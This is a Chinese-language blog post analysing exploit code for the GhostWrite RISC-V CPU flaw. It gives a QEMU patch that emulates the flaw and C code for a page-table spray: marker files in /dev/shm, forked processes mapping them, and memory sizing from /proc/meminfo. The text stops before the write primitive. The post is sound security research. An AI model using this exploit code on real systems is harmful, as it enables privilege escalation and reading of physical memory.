<!DOCTYPE html>
<html lang="zh-CN"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="manifest" href="/images/site.webmanifest">
  <link rel="shortcut icon" href="/images/favicon.ico">

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script>
    (function() {
      var savedTheme = localStorage.getItem('user-color-scheme');
      var validThemes = ['dark', 'light', 'blue-white'];
      var theme = validThemes.indexOf(savedTheme) !== -1
        ? savedTheme
        : (window.matchMedia('(prefers-color-scheme: light)').matches ? 'light' : 'dark');
      document.documentElement.setAttribute('data-theme', theme);
    })();
  </script><!-- Begin Jekyll SEO tag v2.9.0 -->
<title>GhostWrite #2: 漏洞利用代码分析 | Y²的博客</title>
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="GhostWrite #2: 漏洞利用代码分析" />
<meta name="author" content="Y² (aka.cameudis)" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="QEMU Patch" />
<meta name="twitter:description" property="og:description" content="QEMU Patch" />
<link rel="canonical" href="https://www.cameudis.com/2025/01/06/GhostWrite-2.html" />
<meta property="og:url" content="https://www.cameudis.com/2025/01/06/GhostWrite-2.html" />
<meta property="og:site_name" content="Y²的博客" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-01-06T00:00:00+08:00" />
<meta property="article:modified_time" content="2025-01-06T00:00:00+08:00" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="GhostWrite #2: 漏洞利用代码分析" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Y² (aka.cameudis)"},"dateModified":"2025-01-06T00:00:00+08:00","datePublished":"2025-01-06T00:00:00+08:00","description":"QEMU Patch","headline":"GhostWrite #2: 漏洞利用代码分析","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.cameudis.com/2025/01/06/GhostWrite-2.html"},"url":"https://www.cameudis.com/2025/01/06/GhostWrite-2.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="https://www.cameudis.com/feed.xml" title="Y²的博客" /><script src="/assets/js/theme.js" defer></script>
</head>
<body class="layout-post"><header class="site-header" role="banner">
  <div class="wrapper"><div class="header-content">
      <div class="header-content-left">
        <a class="site-title" rel="author" href="/">Y²的博客</a>

        <button class="search-button" id="search-toggle" type="button" aria-label="搜索">
          <svg width="20px" height="20px" viewBox="0 0 100 100" style="shape-rendering: crispEdges;">
            <!-- Frame -->
            <rect x="30" y="10" width="10" height="10" />
            <rect x="40" y="10" width="10" height="10" />
            <rect x="50" y="10" width="10" height="10" />
            <rect x="20" y="20" width="10" height="10" />
            <rect x="60" y="20" width="10" height="10" />
            <rect x="10" y="30" width="10" height="10" />
            <rect x="70" y="30" width="10" height="10" />
            <rect x="10" y="40" width="10" height="10" />
            <rect x="70" y="40" width="10" height="10" />
            <rect x="10" y="50" width="10" height="10" />
            <rect x="70" y="50" width="10" height="10" />
            <rect x="20" y="60" width="10" height="10" />
            <rect x="60" y="60" width="10" height="10" />
            <rect x="30" y="70" width="10" height="10" />
            <rect x="40" y="70" width="10" height="10" />
            <rect x="50" y="70" width="10" height="10" />
            <!-- Handle -->
            <rect x="70" y="70" width="10" height="10" />
            <rect x="80" y="80" width="10" height="10" />
            <rect x="90" y="90" width="10" height="10" />
          </svg>
        </button>

        <div class="theme-picker" id="theme-picker">
          <button class="theme-picker-trigger" id="theme-picker-trigger" type="button"
            aria-label="选择主题" aria-haspopup="menu" aria-expanded="false" aria-controls="theme-picker-menu">
            <span class="theme-picker-bracket" aria-hidden="true">[</span>
            <span class="theme-picker-label">THEME</span>
            <span class="theme-picker-divider" aria-hidden="true">//</span>
            <span class="theme-picker-current">蓝白</span>
            <span class="theme-picker-bracket" aria-hidden="true">]</span>
            <span class="theme-picker-arrow" aria-hidden="true"></span>
          </button>
          <div class="theme-picker-menu" id="theme-picker-menu" role="menu" aria-label="主题选项" hidden>
            <button type="button" role="menuitemradio" data-theme-value="dark" data-theme-label="夜间">
              <span class="theme-option-index">01</span>
              <span class="theme-option-swatch theme-option-swatch-dark" aria-hidden="true"></span>
              <span class="theme-option-label">夜间</span>
              <span class="theme-option-state">OFF</span>
            </button>
            <button type="button" role="menuitemradio" data-theme-value="light" data-theme-label="日间">
              <span class="theme-option-index">02</span>
              <span class="theme-option-swatch theme-option-swatch-light" aria-hidden="true"></span>
              <span class="theme-option-label">日间</span>
              <span class="theme-option-state">OFF</span>
            </button>
            <button type="button" role="menuitemradio" data-theme-value="blue-white" data-theme-label="蓝白">
              <span class="theme-option-index">03</span>
              <span class="theme-option-swatch theme-option-swatch-blue" aria-hidden="true"></span>
              <span class="theme-option-label">蓝白</span>
              <span class="theme-option-state">OFF</span>
            </button>
          </div>
        </div>
      </div><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path
                d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z" />
            </svg>
          </span>
        </label>
        <div class="trigger"><a class="page-link" href="/about/">About</a><a class="page-link" href="/diary/">Diary</a><a class="page-link" href="/links/">Links</a><a class="page-link" href="/readings/">Readings</a></div>
      </nav></div>
  </div>
</header>

<!-- 搜索弹窗 -->
<div class="search-overlay" id="search-overlay" aria-hidden="true"
  data-pagefind-url="/pagefind/pagefind.js">
  <div class="search-modal" role="dialog" aria-modal="true" aria-label="文章搜索">
    <div class="search-header">
      <input type="search" id="search-input" placeholder="搜索文章..." autocomplete="off"
        aria-label="搜索文章" aria-controls="search-results">
      <button class="search-close" id="search-close" type="button" aria-label="关闭搜索">&times;</button>
    </div>
    <div class="search-results" id="search-results" aria-live="polite"></div>
  </div>
</div>

<script src="/assets/js/search.js" defer></script>
<main class="page-content" aria-label="Content">
    <div class="wrapper">
      <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

        <header class="post-header">
          <h1 class="post-title p-name" itemprop="name headline"
            data-pagefind-meta="title, date:2025-01-06">GhostWrite #2: 漏洞利用代码分析</h1>
          <div class="post-meta">
            <time class="dt-published" datetime="2025-01-06T00:00:00+08:00" itemprop="datePublished">[ 2025-01-06 ]
            </time>
            
            <span class="post-tags" data-pagefind-meta="tags">:: #riscv #kernel #arch</span>
            </div>
        </header>

        <div class="post-layout-container">
          <aside class="post-toc">
            <div class="toc-title">TABLE_OF_CONTENTS</div>
            <ul><li><a href="#qemu-patch">QEMU Patch</a></li><li><a href="#任意读攻击">任意读攻击</a><ul><li><a href="#准备文件">准备文件</a></li><li><a href="#映射文件">映射文件</a></li><li><a href="#随机覆写物理内存">随机覆写物理内存</a></li><li><a href="#搜索不一致映射">搜索不一致映射</a></li><li><a href="#达成物理地址任意读">达成物理地址任意读</a></li></ul></li></ul>
          </aside>

          <div class="post-content e-content" itemprop="articleBody" data-pagefind-body>
            <h2 id="qemu-patch">QEMU Patch</h2>

<p>为了复现 GhostWrite 环境，我们需要在 qemu 中添加 patch 来进行软件层面模拟。</p>

<p>qemu 在运行异架构程序时，会将其翻译为一种中间语言 TCG Ops，然后再翻译为 host 架构的机器码，这两步会分别由 TCG 前端和后端来完成。一个简短的介绍见：<a href="https://curiouslearnerblog.wordpress.com/2016/05/04/qemu-tcg-instruction-emulation/">Qemu-TCG instruction emulation</a>。</p>

<p>我们无需关注后端，而只需要在前端完成漏洞指令的翻译。在查询了 <a href="https://www.qemu.org/docs/master/devel/tcg-ops.html">TCG Intermediate Representation — QEMU documentation</a> 后，我发现原生 TCG Ops 中似乎不存在能够绕过 MMU 访问物理地址的指令。qemu 为这种较复杂的翻译场景提供了一种非常方便的功能—— helper 函数。通过在 qemu 的 C 源码中定义一个 helper 函数，并在翻译 Guest 指令时，发射（emit）一条“调用一个 runtime helper function”的 TCG Op，我们可以直接调用到这个 helper 函数，而不必受限于 TCG Ops 的表达能力。在 helper 函数里，我们可以调用 qemu 的各种 API、也可以用 C 语言整各种活。</p>

<p>存在漏洞的指令是 <code class="language-plaintext highlighter-rouge">vse128_v</code> 以及位数更高的一些拓展指令。虽然 V Extension 手册并没有正式定义这几条指令，但我们可以根据推测得到他们的具体指令格式。将这些格式添加到 <code class="language-plaintext highlighter-rouge">target/riscv/insn32.decode</code> 中，就能让 QEMU 解析出这种指令。</p>

<pre><code class="language-txt"># *** Vector loads and stores are encoded within LOADFP/STORE-FP ***
# Vector unit-stride load/store insns.
vle8_v     ... 000 . 00000 ..... 000 ..... 0000111 @r2_nfvm
vle16_v    ... 000 . 00000 ..... 101 ..... 0000111 @r2_nfvm
vle32_v    ... 000 . 00000 ..... 110 ..... 0000111 @r2_nfvm
vle64_v    ... 000 . 00000 ..... 111 ..... 0000111 @r2_nfvm
vse8_v     ... 000 . 00000 ..... 000 ..... 0100111 @r2_nfvm
vse16_v    ... 000 . 00000 ..... 101 ..... 0100111 @r2_nfvm
vse32_v    ... 000 . 00000 ..... 110 ..... 0100111 @r2_nfvm
vse64_v    ... 000 . 00000 ..... 111 ..... 0100111 @r2_nfvm

# GhostWrite
vse128_v   ... 100 . 00000 ..... 000 ..... 0100111 @r2_nfvm
vse256_v   ... 100 . 00000 ..... 101 ..... 0100111 @r2_nfvm
vse512_v   ... 100 . 00000 ..... 110 ..... 0100111 @r2_nfvm
vse1024_v  ... 100 . 00000 ..... 111 ..... 0100111 @r2_nfvm
</code></pre>

<p>我们需要在 <code class="language-plaintext highlighter-rouge">target/riscv/insn_trans/trans_rvv.c.inc</code> 中添加代码来指导 TCG 前端进行翻译，发射 TCG Ops。下面代码的 <code class="language-plaintext highlighter-rouge">gen_helper_ghostwrite</code> 就是指导代码调用名为 <code class="language-plaintext highlighter-rouge">ghostwrite</code> 的 helper 函数。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">bool</span> <span class="nf">ghost_write</span><span class="p">(</span><span class="n">disascontext</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="n">arg_r2nfvm</span> <span class="o">*</span><span class="n">a</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// write one bytes from vs3(rd) to rs1(physical address)</span>

    <span class="n">tcgv_ptr</span> <span class="n">datap</span> <span class="o">=</span> <span class="n">tcg_temp_new_ptr</span><span class="p">();</span>
    <span class="n">tcg_gen_addi_ptr</span><span class="p">(</span><span class="n">datap</span><span class="p">,</span> <span class="n">tcg_env</span><span class="p">,</span> <span class="n">vreg_ofs</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">a</span><span class="o">-&gt;</span><span class="n">rd</span><span class="p">));</span>
    
    <span class="n">gen_helper_ghostwrite</span><span class="p">(</span><span class="n">tcg_env</span><span class="p">,</span> <span class="n">get_gpr</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">a</span><span class="o">-&gt;</span><span class="n">rs1</span><span class="p">,</span> <span class="n">ext_none</span><span class="p">),</span> <span class="n">datap</span><span class="p">);</span>

    <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">static</span> <span class="n">bool</span> <span class="nf">trans_vse128_v</span><span class="p">(</span><span class="n">disascontext</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="n">arg_r2nfvm</span> <span class="o">*</span><span class="n">a</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">ghost_write</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="p">}</span>
<span class="k">static</span> <span class="n">bool</span> <span class="nf">trans_vse256_v</span><span class="p">(</span><span class="n">disascontext</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="n">arg_r2nfvm</span> <span class="o">*</span><span class="n">a</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">ghost_write</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="p">}</span>
<span class="k">static</span> <span class="n">bool</span> <span class="nf">trans_vse512_v</span><span class="p">(</span><span class="n">disascontext</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="n">arg_r2nfvm</span> <span class="o">*</span><span class="n">a</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">ghost_write</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="p">}</span>
<span class="k">static</span> <span class="n">bool</span> <span class="nf">trans_vse1024_v</span><span class="p">(</span><span class="n">disascontext</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="n">arg_r2nfvm</span> <span class="o">*</span><span class="n">a</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="n">ghost_write</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="p">}</span>
</code></pre></div></div>

<p>最后，在 <code class="language-plaintext highlighter-rouge">target/riscv/vector_helper.c</code> 中添加 helper 函数的实现代码，实现物理内存写入：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">HELPER</span><span class="p">(</span><span class="n">ghostwrite</span><span class="p">)(</span><span class="n">CPURISCVState</span> <span class="o">*</span><span class="n">env</span><span class="p">,</span> <span class="n">target_ulong</span> <span class="n">addr</span><span class="p">,</span>
                         <span class="kt">void</span><span class="o">*</span> <span class="n">datap</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">cpu_physical_memory_write</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">datap</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>经过以上三处修改，就可以在 qemu 中模拟 GhostWrite 漏洞。</p>

<h2 id="任意读攻击">任意读攻击</h2>

<p>在进行攻击时，我主要参考了 <a href="https://anonymous.4open.science/r/riscvuzz-artifacts-116D">GhostWrite作者发布的预发布版本代码</a>以及 <a href="https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html">Mark Seaborn 发表在 Project Zero 的 rowhammer 利用博客</a>。</p>

<p>威胁模型是一个可以执行任意代码的普通用户，目标环境是运行于 patched qemu-system-riscv64 的 ubuntu 22.04 server 发行版。启动脚本如下：</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># qemu-system-riscv64 \</span>
./qemu-master/build/qemu-system-riscv64 <span class="se">\</span>
  <span class="nt">-gdb</span> tcp::1235 <span class="nt">-S</span> <span class="se">\</span>
  <span class="nt">-cpu</span> rv64,v<span class="o">=</span><span class="nb">true</span>,vlen<span class="o">=</span>128 <span class="se">\</span>
  <span class="nt">-machine</span> virt <span class="nt">-nographic</span> <span class="nt">-m</span> 2048 <span class="nt">-smp</span> 4 <span class="se">\</span>
  <span class="nt">-bios</span> ./opensbi/build/platform/generic/firmware/fw_jump.bin <span class="se">\</span>
  <span class="nt">-kernel</span> /usr/lib/u-boot/qemu-riscv64_smode/uboot.elf <span class="se">\</span>
  <span class="nt">-fsdev</span> <span class="nb">local</span>,id<span class="o">=</span>fsdev0,path<span class="o">=</span>/home/cameudis/playground/risc-v/shared,security_model<span class="o">=</span>none <span class="se">\</span>
  <span class="nt">-device</span> virtio-9p-pci,fsdev<span class="o">=</span>fsdev0,mount_tag<span class="o">=</span>hostshare <span class="se">\</span>
  <span class="nt">-device</span> virtio-net-device,netdev<span class="o">=</span>eth0 <span class="nt">-netdev</span> user,id<span class="o">=</span>eth0 <span class="se">\</span>
  <span class="nt">-device</span> virtio-rng-pci <span class="se">\</span>
  <span class="nt">-drive</span> <span class="nv">file</span><span class="o">=</span>ubuntu-22.04.4-preinstalled-server-riscv64+unmatched.img,format<span class="o">=</span>raw,if<span class="o">=</span>virtio
</code></pre></div></div>

<p>攻击分为五步：</p>

<ol>
  <li>准备一个位于内存中（<code class="language-plaintext highlighter-rouge">/dev/shm</code>）的巨大文件，在每一页的开头处放置标记；</li>
  <li>fork 出若干子进程，每个子进程都重复把文件映射到自己的内存空间，这样我们就可以在内存中铺满页表；</li>
  <li>使用 GhostWrite 漏洞往一个任意的物理地址写入数据，如果成功干扰了某个子进程的页表数据，映射就会发生改变；</li>
  <li>在所有的子进程内存中进行搜索，尝试找到和原文件不一致的标记，如果找不到就复原并回到第三步；</li>
  <li>如果找到了不一致的标记，我们就知道了该虚拟地址对应的 PTE 的物理内存位置，并可以利用 GhostWrite 控制该虚拟地址的映射。</li>
</ol>

<p>下面我们具体来看每个步骤涉及的细节。</p>

<h3 id="准备文件">准备文件</h3>

<p>第一步的目标是让后续每个子进程都能够映射一大块具有 marker 的内存空间，做到这一点最方便的就是借助 Linux 给用户态提供的 <code class="language-plaintext highlighter-rouge">/dev/shm</code> 机制。用户在这个目录下创建的文件只会临时存在于内存中，并在计算机关闭时彻底消失。（注：一般来说 <code class="language-plaintext highlighter-rouge">/dev/shm</code> 可以被用作 IPC 的平台）</p>

<p>此外，文件不能太大，否则会干扰后续攻击。（我们需要增加随机写物理地址命中页表的概率）</p>

<p>在原版的 RowHammer 攻击中，攻击仅由一个进程发起，而 Linux 有着一个进程最多只能有 2^16 个 VMA（mmap 得到的区域）的限制，因此对文件有着不能太小的要求。本文的攻击脚本 fork 了多个子进程分别进行内存映射，因此没有这个要求，脚本中的文件大小 <code class="language-plaintext highlighter-rouge">file_size</code> 简单地继承了 GhostWrite 作者代码中的大小。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">filename</span> <span class="o">=</span> <span class="s">"/dev/shm/ghostwriter_blob"</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">file_size</span> <span class="o">=</span> <span class="mh">0x1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">;</span>

<span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="n">O_CREAT</span> <span class="o">|</span> <span class="n">O_RDWR</span><span class="p">,</span> <span class="mo">0666</span><span class="p">);</span>
<span class="n">ftruncate</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">file_size</span><span class="p">);</span>
</code></pre></div></div>

<p>然后往文件中写入 marker：</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">data_page_marker</span> <span class="o">=</span> <span class="mh">0xbaadf00ddeadbeef</span><span class="p">;</span>

<span class="kt">uint64_t</span><span class="o">*</span> <span class="n">m</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">file_size</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_SHARED</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">file_size</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="mh">0x1000</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">m</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">data_page_marker</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">munmap</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">file_size</span><span class="p">);</span>
</code></pre></div></div>

<h3 id="映射文件">映射文件</h3>

<p>映射文件的过程非常简单粗暴，直接一直映射直到报错即可。为了确保每次映射都真的创建对应的页表，需要每次映射了一片空间后访问它一下。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kr">inline</span> <span class="nf">__attribute__</span><span class="p">((</span><span class="n">always_inline</span><span class="p">))</span> <span class="kt">void</span> <span class="n">maccess</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">addr</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"ld a7, (%0)"</span> <span class="o">:</span> <span class="o">:</span> <span class="s">"r"</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a7"</span><span class="p">,</span> <span class="s">"memory"</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">uint64_t</span> <span class="nf">fillPageMap</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
  <span class="kt">uint64_t</span> <span class="n">next</span> <span class="o">=</span> <span class="n">vmbase</span><span class="p">;</span>
  <span class="kt">uint64_t</span> <span class="n">last</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">error</span><span class="p">;</span>

  <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">m</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">mmap</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">next</span><span class="p">,</span> <span class="n">file_size</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_SHARED</span> <span class="o">|</span> <span class="n">MAP_FIXED_NOREPLACE</span><span class="p">,</span> <span class="n">fd</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
    <span class="n">error</span> <span class="o">=</span> <span class="n">errno</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">m</span> <span class="o">!=</span> <span class="n">next</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
    <span class="n">last</span> <span class="o">=</span> <span class="n">next</span><span class="p">;</span>
    <span class="n">maccess</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">next</span><span class="p">);</span>
    <span class="n">next</span> <span class="o">+=</span> <span class="n">file_size</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Error: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">error</span><span class="p">));</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Map finished: From 0x%lx to 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">vmbase</span><span class="p">,</span> <span class="n">last</span><span class="p">);</span>

  <span class="k">return</span> <span class="n">last</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>我们需要用页表铺满整个物理内存，但每个进程映射内存的数量是受限的，所以我 fork 出了多个子进程进行映射。在我非常不严谨的测试下，每个子进程最多映射的内存大小为 <code class="language-plaintext highlighter-rouge">0x43000</code>，这样我们就可以计算需要多少个子进程来进行映射。我简单写了适配的代码，以便在内存更大（不是我预设的 2048 M）的情况下也可以计算出需要的子进程工作。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">max_mem_allocated</span> <span class="o">=</span> <span class="mh">0x43000</span><span class="p">;</span> <span class="c1">// tested on qemu ubuntu 22.04</span>

<span class="kt">int</span> <span class="nf">count_child_num</span><span class="p">()</span> <span class="p">{</span>
  <span class="kt">FILE</span><span class="o">*</span> <span class="n">fp</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">"/proc/meminfo"</span><span class="p">,</span> <span class="s">"r"</span><span class="p">);</span>
  <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x80</span><span class="p">];</span>
  <span class="n">fgets</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="n">fp</span><span class="p">);</span>
  <span class="n">fgets</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="n">fp</span><span class="p">);</span>
  <span class="n">fgets</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mh">0x80</span><span class="p">,</span> <span class="n">fp</span><span class="p">);</span>
  <span class="n">assert</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="s">"MemAvailable:"</span><span class="p">,</span> <span class="mi">13</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">);</span>

  <span class="kt">uint64_t</span> <span class="n">MemAvailable</span><span class="p">;</span>
  <span class="n">sscanf</span><span class="p">(</span><span class="n">buf</span><span class="o">+</span><span class="mi">13</span><span class="p">,</span> <span class="s">"%ld"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">MemAvailable</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"MemAvailable: %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">MemAvailable</span><span class="p">);</span>

  <span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span>
  
  <span class="kt">uint64_t</span> <span class="n">child_num</span> <span class="o">=</span> <span class="n">MemAvailable</span> <span class="o">/</span> <span class="n">max_mem_allocated</span><span class="p">;</span>
  <span class="k">return</span> <span class="n">child_num</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>然后就是将上面两部分代码拼接起来。由于父进程需要等待所有子进程结束映射后再进行下一阶段操作，所以我这里使用了信号量进行同步（<code class="language-plaintext highlighter-rouge">semaphore.h</code>）。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">sem_t</span><span class="o">*</span> <span class="n">map_finish</span> <span class="o">=</span> <span class="p">(</span><span class="n">sem_t</span><span class="o">*</span><span class="p">)</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sem_t</span><span class="p">),</span> <span class="n">PROT_READ</span> <span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span><span class="n">MAP_SHARED</span><span class="o">|</span><span class="n">MAP_ANONYMOUS</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">sem_init</span><span class="p">(</span><span class="n">map_finish</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>

<span class="n">child_num</span> <span class="o">=</span> <span class="n">count_child_num</span><span class="p">();</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Child num: %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">child_num</span><span class="p">);</span>

<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">child</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">child</span> <span class="o">&lt;</span> <span class="n">child_num</span><span class="p">;</span> <span class="n">child</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">pid_t</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Fill</span>
    <span class="kt">uint64_t</span> <span class="n">last</span> <span class="o">=</span> <span class="n">fillPageMap</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
    <span class="n">sem_post</span><span class="p">(</span><span class="n">map_finish</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">child_num</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">sem_wait</span><span class="p">(</span><span class="n">map_finish</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="随机覆写物理内存">随机覆写物理内存</h3>

<p>我们需要将 GhostWrite 漏洞包装成一个任意地址写原语。然而非常蛋疼的是，GhostWrite 涉及的指令并没有被标准正式支持，因此汇编器也不认识它，我们需要手动硬编码进对应的机器码。下面几行汇编具体什么意思可以查询 V 拓展的手册，对本篇 wp 并不重要。</p>

